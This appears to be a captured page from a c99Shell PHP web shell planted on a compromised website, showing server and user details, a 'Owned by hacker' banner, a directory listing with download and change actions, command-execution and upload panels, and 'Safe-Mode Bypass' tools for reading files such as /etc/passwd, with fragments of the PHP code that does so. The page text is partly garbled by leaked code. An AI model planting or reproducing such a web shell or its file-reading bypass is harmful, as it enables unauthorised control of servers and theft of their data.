www.opus8.com - phpshell

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.3.3 

uname -a: Linux linux-web.lore.net 2.6.18-371.12.1.el5 #1 SMP Wed Sep 3 16:22:34 EDT 2014 x86_64 

uid=48(apache) gid=48(apache) groups=48(apache) context=user_u:system_r:httpd_t:s0 

Safe-mode: OFF (not secure)

/var/www/vhosts/opus8/   drwxr-xr-x
Free 6.03 GB of 27.03 GB (22.31%)


Owned by hacker

Listing folder (20 files and 8 folders):

Name Size Modify Owner/Group Perms Action
 .. LINK 20.11.2014 16:33:13 0/0 drwxr-xr-x Info 
 . LINK 11.12.2013 19:50:41 0/0 drwxr-xr-x Info 
 [themes] DIR 02.09.2013 20:46:58 0/0 drwxr-xr-x Info 
 [includes] DIR 02.09.2013 20:46:58 0/0 drwxr-xr-x Info 
 [misc] DIR 02.09.2013 20:46:58 0/0 drwxr-xr-x Info 
 [modules] DIR 02.09.2013 20:46:58 0/0 drwxr-xr-x Info 
 [temp] DIR 01.04.2015 15:08:23 0/0 drwxrwxrwx Info 
 [profiles] DIR 02.09.2013 20:46:58 0/0 drwxr-xr-x Info 
 [sites] DIR 02.09.2013 20:46:58 0/0 drwxr-xr-x Info 
 [scripts] DIR 02.09.2013 20:46:58 0/0 drwxr-xr-x Info 
 robots.txt 1.52 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 COPYRIGHT.txt 1.45 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 INSTALL.sqlite.txt 1.27 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 authorize.php 6.45 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 install.php 703 B 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 LICENSE.txt 17.67 KB 17.09.2011 17:50:20 0/0 -rw-r--r-- Info Change Download 
 xmlrpc.php 417 B 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 INSTALL.mysql.txt 1.42 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 README.txt 5.25 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 .htaccess 5.63 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 INSTALL.txt 17.44 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 .gitignore 174 B 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 UPGRADE.txt 9.42 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 CHANGELOG.txt 80.16 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 web.config 2.13 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 INSTALL.pgsql.txt 1.83 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 index.php 529 B 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 cron.php 720 B 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 MAINTAINERS.txt 8 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 
 update.php 19.47 KB 07.08.2013 22:04:26 0/0 -rw-r--r-- Info Change Download 

    


:: Command execute ::


:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Trying To Get File $get
"; if(copy("compress.zlib://".$file, $temp)){ $fichier = fopen($temp, "r"); $action = fread($fichier, filesize($temp)); fclose($fichier); $source=htmlspecialchars($action); echo "
Start $get

$source

Fin $get
"; unlink($temp); } else { die("
Sorry... File ".htmlspecialchars($file)." dosen't exists or you don't have access.
"); } echo "
"; } if(isset($_GET['file'])) { rsg_read(); } ?> $chemin
"; foreach ($files as $filename) { echo "
";
   echo "$filename\n";
   echo "
"; } } if(isset($_GET['directory'])) { rsg_glob(); } ?>
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0203 ]--